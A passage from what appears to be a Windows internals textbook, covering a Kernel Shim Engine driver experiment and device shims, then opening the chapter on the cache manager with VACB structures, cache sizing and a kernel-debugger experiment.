the driver. In the example, we run the driver on an insider
release version of Windows Server 2022:
8.
Now you should stop the driver and enable one of the shims
present in the SDB database. In this example, you will start
with one of the version lie shims. Stop the target driver and
install the shim using the following commands (where
ShimDriver64.sys is the driver’s file name installed with the
previous step):
Click here to view code image
sc stop shimdriver
reg add
"HKLM\System\CurrentControlSet\Control\Compatibility\D
river\
ShimDriver64.sys" /v Shims /t REG_MULTI_SZ /d
KmWin81VersionLie /f /reg:64
9.
The last command adds the Windows 8.1 version lie shim,
but you can freely choose other versions.
10.
Now, if you restart the driver, you will see different
messages printed by the DebugView tool, as shown in the
following figure:
11.
This is because the shim engine has correctly applied the
hooks on the NT APIs used for retrieving OS version
information (the driver is able to detect the shim, too). You
should be able to repeat the experiment using other shims,
like the SkipDriverUnload or the
KernelPadSectionsOverride, which will zero out the driver
unload routine or prevent the target driver from loading, as
shown in the following figure:
Device shims
Unlike Driver shims, shims applied to Device objects are loaded and applied
on demand. The NT kernel exports the KseQueryDeviceData function, which
allows drivers to check whether a shim needs to be applied to a device object.
(Note also that the KseQueryDeviceFlags function is exported. The API is
just a subset of the first one, though.) Querying for device shims is also
possible for user-mode applications through the NtQuerySystemInformation
API used with the SystemDeviceDataInformation information class. Device
shims are always stored in three different locations, consulted in the
following order:
1.
In the
HKLM\System\CurrentControlSet\Control\Compatibility\Device root
registry key, using a key named as the PNP hardware ID of the
device, replacing the \ character with a ! (with the goal to not confuse
the registry). Values in the device key specify the device’s shimmed
data being queried (usually flags for a certain device class).
2.
In the kernel shim cache. The Kernel Shim engine implements a shim
cache (exposed through the KSE_CACHE data structure) with the
goal of speeding up searches for device flags and data.
3.
In the Shim database file, using the KDEVICE root tag. The root tag,
among many others (like device description, manufacturer name,
GUID and so on), includes the child NAME tag containing a string
composed as follows: <DataName:HardwareID>. The KFLAG or
KDATA children tags include the value for the device’s shimmed
data.
If the device shim is not present in the cache but just in the SDB file, it is
always added. In that way, future interrogation would be faster and will not
require any access to the Shim database file.
Conclusion
In this chapter, we have described the most important features of the
Windows operating system that provide management facilities, like the
Windows Registry, user-mode services, task scheduling, UBPM, and
Windows Management Instrumentation (WMI). Furthermore, we have
discussed how Event Tracing for Windows (ETW), DTrace, Windows Error
Reporting (WER), and Global Flags (GFlags) provide the services that allow
users to better trace and diagnose issues arising from any component of the
OS or user-mode applications. The chapter concluded with a peek at the
Kernel Shim engine, which helps the system apply compatibility strategies
and correctly execute old components that have been designed for older
versions of the operating system.
The next chapter delves into the different file systems available in
Windows and with the global caching available for speeding up file and data
access.
CHAPTER 11
Caching and file systems
The cache manager is a set of kernel-mode functions and system threads that
cooperate with the memory manager to provide data caching for all Windows
file system drivers (both local and network). In this chapter, we explain how
the cache manager, including its key internal data structures and functions,
works; how it is sized at system initialization time; how it interacts with other
elements of the operating system; and how you can observe its activity
through performance counters. We also describe the five flags on the
Windows CreateFile function that affect file caching and DAX volumes,
which are memory-mapped disks that bypass the cache manager for certain
types of I/O.
The services exposed by the cache manager are used by all the Windows
File System drivers, which cooperate strictly with the former to be able to
manage disk I/O as fast as possible. We describe the different file systems
supported by Windows, in particular with a deep analysis of NTFS and ReFS
(the two most used file systems). We present their internal architecture and
basic operations, including how they interact with other system components,
such as the memory manager and the cache manager.
The chapter concludes with an overview of Storage Spaces, the new
storage solution designed to replace dynamic disks. Spaces can create tiered
and thinly provisioned virtual disks, providing features that can be leveraged
by the file system that resides at the top.
Terminology
To fully understand this chapter, you need to be familiar with some basic
terminology:
■ Disks are physical storage devices such as a hard disk, CD-ROM,
DVD, Blu-ray, solid-state disk (SSD), Non-volatile Memory disk
(NVMe), or flash drive.
■ Sectors are hardware-addressable blocks on a storage medium. Sector
sizes are determined by hardware. Most hard disk sectors are 4,096 or
512 bytes, DVD-ROM and Blu-ray sectors are typically 2,048 bytes.
Thus, if the sector size is 4,096 bytes and the operating system wants
to modify the 5120th byte on a disk, it must write a 4,096-byte block
of data to the second sector on the disk.
■ Partitions are collections of contiguous sectors on a disk. A partition
table or other disk-management database stores a partition’s starting
sector, size, and other characteristics and is located on the same disk
as the partition.
■ Volumes are objects that represent sectors that file system drivers
always manage as a single unit. Simple volumes represent sectors
from a single partition, whereas multipartition volumes represent
sectors from multiple partitions. Multipartition volumes offer
performance, reliability, and sizing features that simple volumes do
not.
■ File system formats define the way that file data is stored on storage
media, and they affect a file system’s features. For example, a format
that doesn’t allow user permissions to be associated with files and
directories can’t support security. A file system format also can
impose limits on the sizes of files and storage devices that the file
system supports. Finally, some file system formats efficiently
implement support for either large or small files or for large or small
disks. NTFS, exFAT, and ReFS are examples of file system formats
that offer different sets of features and usage scenarios.
■ Clusters are the addressable blocks that many file system formats use.
Cluster size is always a multiple of the sector size, as shown in Figure
11-1, in which eight sectors make up each cluster, which are
represented by a yellow band. File system formats use clusters to
manage disk space more efficiently; a cluster size that is larger than
the sector size divides a disk into more manageable blocks. The
potential trade-off of a larger cluster size is wasted disk space, or
internal fragmentation, that results when file sizes aren’t exact
multiples of the cluster size.
Figure 11-1 Sectors and clusters on a classical spinning disk.
■ Metadata is data stored on a volume in support of file system format
management. It isn’t typically made accessible to applications.
Metadata includes the data that defines the placement of files and
directories on a volume, for example.
Key features of the cache manager
The cache manager has several key features:
■ Supports all file system types (both local and network), thus removing
the need for each file system to implement its own cache management
code.
■ Uses the memory manager to control which parts of which files are in
physical memory (trading off demands for physical memory between
user processes and the operating system).
■ Caches data on a virtual block basis (offsets within a file)—in contrast
to many caching systems, which cache on a logical block basis
(offsets within a disk volume)—allowing for intelligent read-ahead
and high-speed access to the cache without involving file system
drivers. (This method of caching, called fast I/O, is described later in
this chapter.)
■ Supports “hints” passed by applications at file open time (such as
random versus sequential access, temporary file creation, and so on).
■ Supports recoverable file systems (for example, those that use
transaction logging) to recover data after a system failure.
■ Supports solid state, NVMe, and direct access (DAX) disks.
Although we talk more throughout this chapter about how these features
are used in the cache manager, in this section we introduce you to the
concepts behind these features.
Single, centralized system cache
Some operating systems rely on each individual file system to cache data, a
practice that results either in duplicated caching and memory management
code in the operating system or in limitations on the kinds of data that can be
cached. In contrast, Windows offers a centralized caching facility that caches
all externally stored data, whether on local hard disks, USB removable
drives, network file servers, or DVD-ROMs. Any data can be cached,
whether it’s user data streams (the contents of a file and the ongoing read and
write activity to that file) or file system metadata (such as directory and file
headers). As we discuss in this chapter, the method Windows uses to access
the cache depends on the type of data being cached.
The memory manager
One unusual aspect of the cache manager is that it never knows how much
cached data is actually in physical memory. This statement might sound
strange because the purpose of a cache is to keep a subset of frequently
accessed data in physical memory as a way to improve I/O performance. The
reason the cache manager doesn’t know how much data is in physical
memory is that it accesses data by mapping views of files into system virtual
address spaces, using standard section objects (or file mapping objects in
Windows API terminology). (Section objects are a basic primitive of the
memory manager and are explained in detail in Chapter 5, “Memory
Management” of Part 1). As addresses in these mapped views are accessed,
the memory manager pages-in blocks that aren’t in physical memory. And
when memory demands dictate, the memory manager unmaps these pages out
of the cache and, if the data has changed, pages the data back to the files.
By caching on the basis of a virtual address space using mapped files, the
cache manager avoids generating read or write I/O request packets (IRPs) to
access the data for files it’s caching. Instead, it simply copies data to or from
the virtual addresses where the portion of the cached file is mapped and relies
on the memory manager to fault in (or out) the data in to (or out of) memory
as needed. This process allows the memory manager to make global trade-
offs on how much RAM to give to the system cache versus how much to give
to user processes. (The cache manager also initiates I/O, such as lazy writing,
which we describe later in this chapter; however, it calls the memory
manager to write the pages.) Also, as we discuss in the next section, this
design makes it possible for processes that open cached files to see the same
data as do other processes that are mapping the same files into their user
address spaces.
Cache coherency
One important function of a cache manager is to ensure that any process that
accesses cached data will get the most recent version of that data. A problem
can arise when one process opens a file (and hence the file is cached) while
another process maps the file into its address space directly (using the
Windows MapViewOfFile function). This potential problem doesn’t occur
under Windows because both the cache manager and the user applications
that map files into their address spaces use the same memory management
file mapping services. Because the memory manager guarantees that it has
only one representation of each unique mapped file (regardless of the number
of section objects or mapped views), it maps all views of a file (even if they
overlap) to a single set of pages in physical memory, as shown in Figure 11-
2. (For more information on how the memory manager works with mapped
files, see Chapter 5 of Part 1.)
Figure 11-2 Coherent caching scheme.
So, for example, if Process 1 has a view (View 1) of the file mapped into
its user address space, and Process 2 is accessing the same view via the
system cache, Process 2 sees any changes that Process 1 makes as they’re
made, not as they’re flushed. The memory manager won’t flush all user-
mapped pages—only those that it knows have been written to (because they
have the modified bit set). Therefore, any process accessing a file under
Windows always sees the most up-to-date version of that file, even if some
processes have the file open through the I/O system and others have the file
mapped into their address space using the Windows file mapping functions.
Note
Cache coherency in this case refers to coherency between user-mapped
data and cached I/O and not between noncached and cached hardware
access and I/Os, which are almost guaranteed to be incoherent. Also,
cache coherency is somewhat more difficult for network redirectors than
for local file systems because network redirectors must implement
additional flushing and purge operations to ensure cache coherency when
accessing network data.
Virtual block caching
The Windows cache manager uses a method known as virtual block caching,
in which the cache manager keeps track of which parts of which files are in
the cache. The cache manager is able to monitor these file portions by
mapping 256 KB views of files into system virtual address spaces, using
special system cache routines located in the memory manager. This approach
has the following key benefits:
■ It opens up the possibility of doing intelligent read-ahead; because the
cache tracks which parts of which files are in the cache, it can predict
where the caller might be going next.
■ It allows the I/O system to bypass going to the file system for requests
for data that is already in the cache (fast I/O). Because the cache
manager knows which parts of which files are in the cache, it can
return the address of cached data to satisfy an I/O request without
having to call the file system.
Details of how intelligent read-ahead and fast I/O work are provided later
in this chapter in the “Fast I/O” and “Read-ahead and write-behind” sections.
Stream-based caching
The cache manager is also designed to do stream caching rather than file
caching. A stream is a sequence of bytes within a file. Some file systems,
such as NTFS, allow a file to contain more than one stream; the cache
manager accommodates such file systems by caching each stream
independently. NTFS can exploit this feature by organizing its master file
table (described later in this chapter in the “Master file table” section) into
streams and by caching these streams as well. In fact, although the cache
manager might be said to cache files, it actually caches streams (all files have
at least one stream of data) identified by both a file name and, if more than
one stream exists in the file, a stream name.
Note
Internally, the cache manager is not aware of file or stream names but
uses pointers to these structures.
Recoverable file system support
Recoverable file systems such as NTFS are designed to reconstruct the disk
volume structure after a system failure. This capability means that I/O
operations in progress at the time of a system failure must be either entirely
completed or entirely backed out from the disk when the system is restarted.
Half-completed I/O operations can corrupt a disk volume and even render an
entire volume inaccessible. To avoid this problem, a recoverable file system
maintains a log file in which it records every update it intends to make to the
file system structure (the file system’s metadata) before it writes the change
to the volume. If the system fails, interrupting volume modifications in
progress, the recoverable file system uses information stored in the log to
reissue the volume updates.
To guarantee a successful volume recovery, every log file record
documenting a volume update must be completely written to disk before the
update itself is applied to the volume. Because disk writes are cached, the
cache manager and the file system must coordinate metadata updates by
ensuring that the log file is flushed ahead of metadata updates. Overall, the
following actions occur in sequence:
1.
The file system writes a log file record documenting the metadata
update it intends to make.
2.
The file system calls the cache manager to flush the log file record to
disk.
3.
The file system writes the volume update to the cache—that is, it
modifies its cached metadata.
4.
The cache manager flushes the altered metadata to disk, updating the
volume structure. (Actually, log file records are batched before being
flushed to disk, as are volume modifications.)
Note
The term metadata applies only to changes in the file system structure:
file and directory creation, renaming, and deletion.
When a file system writes data to the cache, it can supply a logical
sequence number (LSN) that identifies the record in its log file, which
corresponds to the cache update. The cache manager keeps track of these
numbers, recording the lowest and highest LSNs (representing the oldest and
newest log file records) associated with each page in the cache. In addition,
data streams that are protected by transaction log records are marked as “no
write” by NTFS so that the mapped page writer won’t inadvertently write out
these pages before the corresponding log records are written. (When the
mapped page writer sees a page marked this way, it moves the page to a
special list that the cache manager then flushes at the appropriate time, such
as when lazy writer activity takes place.)
When it prepares to flush a group of dirty pages to disk, the cache manager
determines the highest LSN associated with the pages to be flushed and
reports that number to the file system. The file system can then call the cache
manager back, directing it to flush log file data up to the point represented by
the reported LSN. After the cache manager flushes the log file up to that
LSN, it flushes the corresponding volume structure updates to disk, thus
ensuring that it records what it’s going to do before actually doing it. These
interactions between the file system and the cache manager guarantee the
recoverability of the disk volume after a system failure.
NTFS MFT working set enhancements
As we have described in the previous paragraphs, the mechanism that the
cache manager uses to cache files is the same as general memory mapped I/O
interfaces provided by the memory manager to the operating system. For
accessing or caching a file, the cache manager maps a view of the file in the
system virtual address space. The contents are then accessed simply by
reading off the mapped virtual address range. When the cached content of a
file is no longer needed (for various reasons—see the next paragraphs for
details), the cache manager unmaps the view of the file. This strategy works
well for any kind of data files but has some problems with the metadata that
the file system maintains for correctly storing the files in the volume.
When a file handle is closed (or the owning process dies), the cache
manager ensures that the cached data is no longer in the working set. The
NTFS file system accesses the Master File Table (MFT) as a big file, which
is cached like any other user files by the cache manager. The problem with
the MFT is that, since it is a system file, which is mapped and processed in
the System process context, nobody will ever close its handle (unless the
volume is unmounted), so the system never unmaps any cached view of the
MFT. The process that initially caused a particular view of MFT to be
mapped might have closed the handle or exited, leaving potentially unwanted
views of MFT still mapped into memory consuming valuable system cache
(these views will be unmapped only if the system runs into memory
pressure).
Windows 8.1 resolved this problem by storing a reference counter to every
MFT record in a dynamically allocated multilevel array, which is stored in
the NTFS file system Volume Control Block (VCB) structure. Every time a
File Control Block (FCB) data structure is created (further details on the FCB
and VCB are available later in this chapter), the file system increases the
counter of the relative MFT index record. In the same way, when the FCB is
destroyed (meaning that all the handles to the file or directory that the MFT
entry refers to are closed), NTFS dereferences the relative counter and calls
the CcUnmapFileOffsetFromSystemCache cache manager routine, which
will unmap the part of the MFT that is no longer needed.
Memory partitions support
Windows 10, with the goal to provide support for Hyper-V containers
containers and game mode, introduced the concept of partitions. Memory
partitions have already been described in Chapter 5 of Part 1. As seen in that
chapter, memory partitions are represented by a large data structure
(MI_PARTITION), which maintains memory-related management structures
related to the partition, such as page lists (standby, modified, zero, free, and
so on), commit charge, working set, page trimmer, modified page writer, and
zero-page thread. The cache manager needs to cooperate with the memory
manager in order to support partitions. During phase 1 of NT kernel
initialization, the system creates and initializes the cache manager partition
(for further details about Windows kernel initialization, see Chapter 12,
“Startup and shutdown”), which will be part of the System Executive
partition (MemoryPartition0). The cache manager’s code has gone through a
big refactoring to support partitions; all the global cache manager data
structures and variables have been moved in the cache manager partition data
structure (CC_PARTITION).
The cache manager’s partition contains cache-related data, like the global
shared cache maps list, the worker threads list (read-ahead, write-behind, and
extra write-behind; lazy writer and lazy writer scan; async reads), lazy writer
scan events, an array that holds the history of write-behind throughout, the
upper and lower limit for the dirty pages threshold, the number of dirty
pages, and so on. When the cache manager system partition is initialized, all
the needed system threads are started in the context of a System process
which belongs to the partition. Each partition always has an associated
minimal System process, which is created at partition-creation time (by the
NtCreatePartition API).
When the system creates a new partition through the NtCreatePartition
API, it always creates and initializes an empty MI_PARTITION object (the
memory is moved from a parent partition to the child, or hot-added later by
using the NtManagePartition function). A cache manager partition object is
created only on-demand. If no files are created in the context of the new
partition, there is no need to create the cache manager partition object. When
the file system creates or opens a file for caching access, the
CcinitializeCacheMap(Ex) function checks which partition the file belongs to
and whether the partition has a valid link to a cache manager partition. In
case there is no cache manager partition, the system creates and initializes a
new one through the CcCreatePartition routine. The new partition starts
separate cache manager-related threads (read-ahead, lazy writers, and so on)
and calculates the new values of the dirty page threshold based on the
number of pages that belong to the specific partition.
The file object contains a link to the partition it belongs to through its
control area, which is initially allocated by the file system driver when
creating and mapping the Stream Control Block (SCB). The partition of the
target file is stored into a file object extension (of type
MemoryPartitionInformation) and is checked by the memory manager when
creating the section object for the SCB. In general, files are shared entities, so
there is no way for File System drivers to automatically associate a file to a
different partition than the System Partition. An application can set a
different partition for a file using the NtSetInformationFileKernel API,
through the new FileMemoryPartitionInformation class.
Cache virtual memory management
Because the Windows system cache manager caches data on a virtual basis, it
uses up regions of system virtual address space (instead of physical memory)
and manages them in structures called virtual address control blocks, or
VACBs. VACBs define these regions of address space into 256 KB slots
called views. When the cache manager initializes during the bootup process,
it allocates an initial array of VACBs to describe cached memory. As caching
requirements grow and more memory is required, the cache manager
allocates more VACB arrays, as needed. It can also shrink virtual address
space as other demands put pressure on the system.
At a file’s first I/O (read or write) operation, the cache manager maps a
256 KB view of the 256 KB-aligned region of the file that contains the
requested data into a free slot in the system cache address space. For
example, if 10 bytes starting at an offset of 300,000 bytes were read into a
file, the view that would be mapped would begin at offset 262144 (the
second 256 KB-aligned region of the file) and extend for 256 KB.
The cache manager maps views of files into slots in the cache’s address
space on a round-robin basis, mapping the first requested view into the first
256 KB slot, the second view into the second 256 KB slot, and so forth, as
shown in Figure 11-3. In this example, File B was mapped first, File A
second, and File C third, so File B’s mapped chunk occupies the first slot in
the cache. Notice that only the first 256 KB portion of File B has been
mapped, which is due to the fact that only part of the file has been accessed.
Because File C is only 100 KB (and thus smaller than one of the views in the
system cache), it requires its own 256 KB slot in the cache.
Figure 11-3 Files of varying sizes mapped into the system cache.
The cache manager guarantees that a view is mapped as long as it’s active
(although views can remain mapped after they become inactive). A view is
marked active, however, only during a read or write operation to or from the
file. Unless a process opens a file by specifying the FILE_FLAG_RANDOM_
ACCESS flag in the call to CreateFile, the cache manager unmaps inactive
views of a file as it maps new views for the file if it detects that the file is
being accessed sequentially. Pages for unmapped views are sent to the
standby or modified lists (depending on whether they have been changed),
and because the memory manager exports a special interface for the cache
manager, the cache manager can direct the pages to be placed at the end or
front of these lists. Pages that correspond to views of files opened with the
FILE_FLAG_SEQUENTIAL_SCAN flag are moved to the front of the lists,
whereas all others are moved to the end. This scheme encourages the reuse of
pages belonging to sequentially read files and specifically prevents a large
file copy operation from affecting more than a small part of physical
memory. The flag also affects unmapping. The cache manager will
aggressively unmap views when this flag is supplied.
If the cache manager needs to map a view of a file, and there are no more
free slots in the cache, it will unmap the least recently mapped inactive view
and use that slot. If no views are available, an I/O error is returned, indicating
that insufficient system resources are available to perform the operation.
Given that views are marked active only during a read or write operation,
however, this scenario is extremely unlikely because thousands of files
would have to be accessed simultaneously for this situation to occur.
Cache size
In the following sections, we explain how Windows computes the size of the
system cache, both virtually and physically. As with most calculations related
to memory management, the size of the system cache depends on a number
of factors.
Cache virtual size
On a 32-bit Windows system, the virtual size of the system cache is limited
solely by the amount of kernel-mode virtual address space and the
SystemCacheLimit registry key that can be optionally configured. (See
Chapter 5 of Part 1 for more information on limiting the size of the kernel
virtual address space.) This means that the cache size is capped by the 2-GB
system address space, but it is typically significantly smaller because the
system address space is shared with other resources, including system paged
table entries (PTEs), nonpaged and paged pool, and page tables. The
maximum virtual cache size is 64 TB on 64-bit Windows, and even in this
case, the limit is still tied to the system address space size: in future systems
that will support the 56-bit addressing mode, the limit will be 32 PB
(petabytes).
Cache working set size
As mentioned earlier, one of the key differences in the design of the cache
manager in Windows from that of other operating systems is the delegation
of physical memory management to the global memory manager. Because of
this, the existing code that handles working set expansion and trimming, as
well as managing the modified and standby lists, is also used to control the
size of the system cache, dynamically balancing demands for physical
memory between processes and the operating system.
The system cache doesn’t have its own working set but shares a single
system set that includes cache data, paged pool, pageable kernel code, and
pageable driver code. As explained in the section “System working sets” in
Chapter 5 of Part 1, this single working set is called internally the system
cache working set even though the system cache is just one of the
components that contribute to it. For the purposes of this book, we refer to
this working set simply as the system working set. Also explained in Chapter
5 is the fact that if the LargeSystemCache registry value is 1, the memory
manager favors the system working set over that of processes running on the
system.
Cache physical size
While the system working set includes the amount of physical memory that is
mapped into views in the cache’s virtual address space, it does not
necessarily reflect the total amount of file data that is cached in physical
memory. There can be a discrepancy between the two values because
additional file data might be in the memory manager’s standby or modified
page lists.
Recall from Chapter 5 that during the course of working set trimming or
page replacement, the memory manager can move dirty pages from a
working set to either the standby list or the modified page list, depending on
whether the page contains data that needs to be written to the paging file or
another file before the page can be reused. If the memory manager didn’t
implement these lists, any time a process accessed data previously removed
from its working set, the memory manager would have to hard-fault it in
from disk. Instead, if the accessed data is present on either of these lists, the
memory manager simply soft-faults the page back into the process’s working
set. Thus, the lists serve as in-memory caches of data that are stored in the
paging file, executable images, or data files. Thus, the total amount of file
data cached on a system includes not only the system working set but the
combined sizes of the standby and modified page lists as well.
An example illustrates how the cache manager can cause much more file
data than that containable in the system working set to be cached in physical
memory. Consider a system that acts as a dedicated file server. A client
application accesses file data from across the network, while a server, such as
the file server driver (%SystemRoot%\System32\Drivers\Srv2.sys, described
later in this chapter), uses cache manager interfaces to read and write file data
on behalf of the client. If the client reads through several thousand files of 1
MB each, the cache manager will have to start reusing views when it runs out
of mapping space (and can’t enlarge the VACB mapping area). For each file
read thereafter, the cache manager unmaps views and remaps them for new
files. When the cache manager unmaps a view, the memory manager doesn’t
discard the file data in the cache’s working set that corresponds to the view;
it moves the data to the standby list. In the absence of any other demand for
physical memory, the standby list can consume almost all the physical
memory that remains outside the system working set. In other words,
virtually all the server’s physical memory will be used to cache file data, as
shown in Figure 11-4.
Figure 11-4 Example in which most of physical memory is being used by
the file cache.
Because the total amount of file data cached includes the system working
set, modified page list, and standby list—the sizes of which are all controlled
by the memory manager—it is in a sense the real cache manager. The cache
manager subsystem simply provides convenient interfaces for accessing file
data through the memory manager. It also plays an important role with its
read-ahead and write-behind policies in influencing what data the memory
manager keeps present in physical memory, as well as with managing system
virtual address views of the space.
To try to accurately reflect the total amount of file data that’s cached on a
system, Task Manager shows a value named “Cached” in its performance
view that reflects the combined size of the system working set, standby list,
and modified page list. Process Explorer, on the other hand, breaks up these
values into Cache WS (system cache working set), Standby, and Modified.
Figure 11-5 shows the system information view in Process Explorer and the
Cache WS value in the Physical Memory area in the lower left of the figure,
as well as the size of the standby and modified lists in the Paging Lists area
near the middle of the figure. Note that the Cache value in Task Manager
also includes the Paged WS, Kernel WS, and Driver WS values shown in
Process Explorer. When these values were chosen, the vast majority of
System WS came from the Cache WS. This is no longer the case today, but
the anachronism remains in Task Manager.
Figure 11-5 Process Explorer’s System Information dialog box.
Cache data structures
The cache manager uses the following data structures to keep track of cached
files:
■ Each 256 KB slot in the system cache is described by a VACB.
■ Each separately opened cached file has a private cache map, which
contains information used to control read-ahead (discussed later in the
chapter in the “Intelligent read-ahead” section).
■ Each cached file has a single shared cache map structure, which
points to slots in the system cache that contain mapped views of the
file.
These structures and their relationships are described in the next sections.
Systemwide cache data structures
As previously described, the cache manager keeps track of the state of the
views in the system cache by using an array of data structures called virtual
address control block (VACB) arrays that are stored in nonpaged pool. On a
32-bit system, each VACB is 32 bytes in size and a VACB array is 128 KB,
resulting in 4,096 VACBs per array. On a 64-bit system, a VACB is 40 bytes,
resulting in 3,276 VACBs per array. The cache manager allocates the initial
VACB array during system initialization and links it into the systemwide list
of VACB arrays called CcVacbArrays. Each VACB represents one 256 KB
view in the system cache, as shown in Figure 11-6. The structure of a VACB
is shown in Figure 11-7.
Figure 11-6 System VACB array.
Figure 11-7 VACB data structure.
Additionally, each VACB array is composed of two kinds of VACB: low
priority mapping VACBs and high priority mapping VACBs. The system
allocates 64 initial high priority VACBs for each VACB array. High priority
VACBs have the distinction of having their views preallocated from system
address space. When the memory manager has no views to give to the cache
manager at the time of mapping some data, and if the mapping request is
marked as high priority, the cache manager will use one of the preallocated
views present in a high priority VACB. It uses these high priority VACBs,
for example, for critical file system metadata as well as for purging data from
the cache. After high priority VACBs are gone, however, any operation
requiring a VACB view will fail with insufficient resources. Typically, the
mapping priority is set to the default of low, but by using the
PIN_HIGH_PRIORITY flag when pinning (described later) cached data, file
systems can request a high priority VACB to be used instead, if one is
needed.
As you can see in Figure 11-7, the first field in a VACB is the virtual
address of the data in the system cache. The second field is a pointer to the
shared cache map structure, which identifies which file is cached. The third
field identifies the offset within the file at which the view begins (always
based on 256 KB granularity). Given this granularity, the bottom 16 bits of
the file offset will always be zero, so those bits are reused to store the number
of references to the view—that is, how many active reads or writes are
accessing the view. The fourth field links the VACB into a list of least-
recently-used (LRU) VACBs when the cache manager frees the VACB; the
cache manager first checks this list when allocating a new VACB. Finally,
the fifth field links this VACB to the VACB array header representing the
array in which the VACB is stored.
During an I/O operation on a file, the file’s VACB reference count is
incremented, and then it’s decremented when the I/O operation is over. When
the reference count is nonzero, the VACB is active. For access to file system
metadata, the active count represents how many file system drivers have the
pages in that view locked into memory.
EXPERIMENT: Looking at VACBs and VACB
statistics
The cache manager internally keeps track of various values that are
useful to developers and support engineers when debugging crash
dumps. All these debugging variables start with the CcDbg prefix,
which makes it easy to see the whole list, thanks to the x command:
Click here to view code image
1: kd> x nt!*ccdbg*
fffff800`d052741c
nt!CcDbgNumberOfFailedWorkQueueEntryAllocations = <no type
information>
fffff800`d05276ec nt!CcDbgNumberOfNoopedReadAheads = <no
type information>
fffff800`d05276e8 nt!CcDbgLsnLargerThanHint = <no type
information>
fffff800`d05276e4 nt!CcDbgAdditionalPagesQueuedCount = <no
type information>
fffff800`d0543370 nt!CcDbgFoundAsyncReadThreadListEmpty =
<no type information>
fffff800`d054336c nt!CcDbgNumberOfCcUnmapInactiveViews = <no
type information>
fffff800`d05276e0 nt!CcDbgSkippedReductions = <no type
information>
fffff800`d0542e04 nt!CcDbgDisableDAX = <no type information>
...
Some systems may show differences in variable names due to
32-bit versus 64-bit implementations. The exact variable names are
irrelevant in this experiment—focus instead on the methodology
that is explained. Using these variables and your knowledge of the
VACB array header data structures, you can use the kernel
debugger to list all the VACB array headers. The CcVacbArrays
variable is an array of pointers to VACB array headers, which you
dereference to dump the contents of the
_VACB_ARRAY_HEADERs. First, obtain the highest array index:
Click here to view code image
1: kd> dd nt!CcVacbArraysHighestUsedIndex l1
fffff800`d0529c1c 00000000
And now you can dereference each index until the maximum
index. On this system (and this is the norm), the highest index is 0,
which means there’s only one header to dereference:
Click here to view code image
1: kd> ?? (*((nt!_VACB_ARRAY_HEADER***)@@(nt!CcVacbArrays)))
[0]
struct _VACB_ARRAY_HEADER * 0xffffc40d`221cb000
+0x000 VacbArrayIndex : 0
+0x004 MappingCount : 0x302
+0x008 HighestMappedIndex : 0x301
+0x00c Reserved : 0
If there were more, you could change the array index at the end
of the command with a higher number, until you reach the highest
used index. The output shows that the system has only one VACB
array with 770 (0x302) active VACBs.
Finally, the CcNumberOfFreeVacbs variable stores the number
of VACBs on the free VACB list. Dumping this variable on the
system used for the experiment results in 2,506 (0x9ca):
Click here to view code image
1: kd> dd nt!CcNumberOfFreeVacbs l1
fffff800`d0527318 000009ca
As expected, the sum of the free (0x9ca—2,506 decimal) and
active VACBs (0x302—770 decimal) on a 64-bit system with one
VACB array equals 3,276, the number of VACBs in one VACB
array. If the system were to run out of free VACBs, the cache
manager would try to allocate a new VACB array. Because of the
volatile nature of this experiment, your system may create and/or
free additional VACBs between the two steps (dumping the active
and then the free VACBs). This might cause your total of free and
active VACBs to not match exactly 3,276. Try quickly repeating
the experiment a couple of times if this happens, although you may
never get stable numbers, especially if there is lots of file system
activity on the system.
Per-file cache data structures
Each open handle to a file has a corresponding file object. (File objects are
explained in detail in Chapter 6 of Part 1, “I/O system.”) If the file is cached,
the file object points to a private cache map structure that contains the
location of the last two reads so that the cache manager can perform
intelligent read-ahead (described later, in the section “Intelligent read-
ahead”). In addition, all the private cache maps for open instances of a file are
linked together.
Each cached file (as opposed to file object) has a shared cache map
structure that describes the state of the cached file, including the partition to
which it belongs, its size, and its valid data length. (The function of the valid
data length field is explained in the section “Write-back caching and lazy
writing.”) The shared cache map also points to the section object (maintained
by the memory manager and which describes the file’s mapping into virtual
memory), the list of private cache maps associated with that file, and any
VACBs that describe currently mapped views of the file in the system cache.
(See Chapter 5 of Part 1 for more about section object pointers.) All the
opened shared cache maps for different files are linked in a global linked list
maintained in the cache manager’s partition data structure. The relationships
among these per-file cache data structures are illustrated in Figure 11-8.
Figure 11-8 Per-file cache data structures.
When asked to read from a particular file, the cache manager must
determine the answers to two questions:
1.
Is the file in the cache?
2.
If so, which VACB, if any, refers to the requested location?
In other words, the cache manager must find out whether a view of the file
at the desired address is mapped into the system cache. If no VACB contains
the desired file offset, the requested data isn’t currently mapped into the
system cache.
To keep track of which views for a given file are mapped into the system
cache, the cache manager maintains an array of pointers to VACBs, which is
known as the VACB index array. The first entry in the VACB index array
refers to the first 256 KB of the file, the second entry to the second 256 KB,
and so on. The diagram in Figure 11-9 shows four different sections from
three different files that are currently mapped into the system cache.
When a process accesses a particular file in a given location, the cache
manager looks in the appropriate entry in the file’s VACB index array to see
whether the requested data has been mapped into the cache. If the array entry
is nonzero (and hence contains a pointer to a VACB), the area of the file
being referenced is in the cache. The VACB, in turn, points to the location in
the system cache where the view of the file is mapped. If the entry is zero,
the cache manager must find a free slot in the system cache (and therefore a
free VACB) to map the required view.
As a size optimization, the shared cache map contains a VACB index array
that is four entries in size. Because each VACB describes 256 KB, the entries
in this small, fixed-size index array can point to VACB array entries that
together describe a file of up to 1 MB. If a file is larger than 1 MB, a separate
VACB index array is allocated from nonpaged pool, based on the size of the
file divided by 256 KB and rounded up in the case of a remainder. The
shared cache map then points to this separate structure.
Figure 11-9 VACB index arrays.
As a further optimization, the VACB index array allocated from nonpaged
pool becomes a sparse multilevel index array if the file is larger than 32 MB,
where each index array consists of 128 entries. You can calculate the number
of levels required for a file with the following formula:
(Number of bits required to represent file size – 18) / 7
Round up the result of the equation to the next whole number. The value
18 in the equation comes from the fact that a VACB represents 256 KB, and
256 KB is 2^18. The value 7 comes from the fact that each level in the array
has 128 entries and 2^7 is 128. Thus, a file that has a size that is the
maximum that can be described with 63 bits (the largest size the cache
manager supports) would require only seven levels. The array is sparse
because the only branches that the cache manager allocates are ones for
which there are active views at the lowest-level index array. Figure 11-10
shows an example of a multilevel VACB array for a sparse file that is large
enough to require three levels.
Figure 11-10 Multilevel VACB arrays.
This scheme is required to efficiently handle sparse files that might have
extremely large file sizes with only a small fraction of valid data because
only enough of the array is allocated to handle the currently mapped views of
a file. For example, a 32-GB sparse file for which only 256 KB is mapped
into the cache’s virtual address space would require a VACB array with three
allocated index arrays because only one branch of the array has a mapping
and a 32-GB file requires a three-level array. If the cache manager didn’t use
the multilevel VACB index array optimization for this file, it would have to
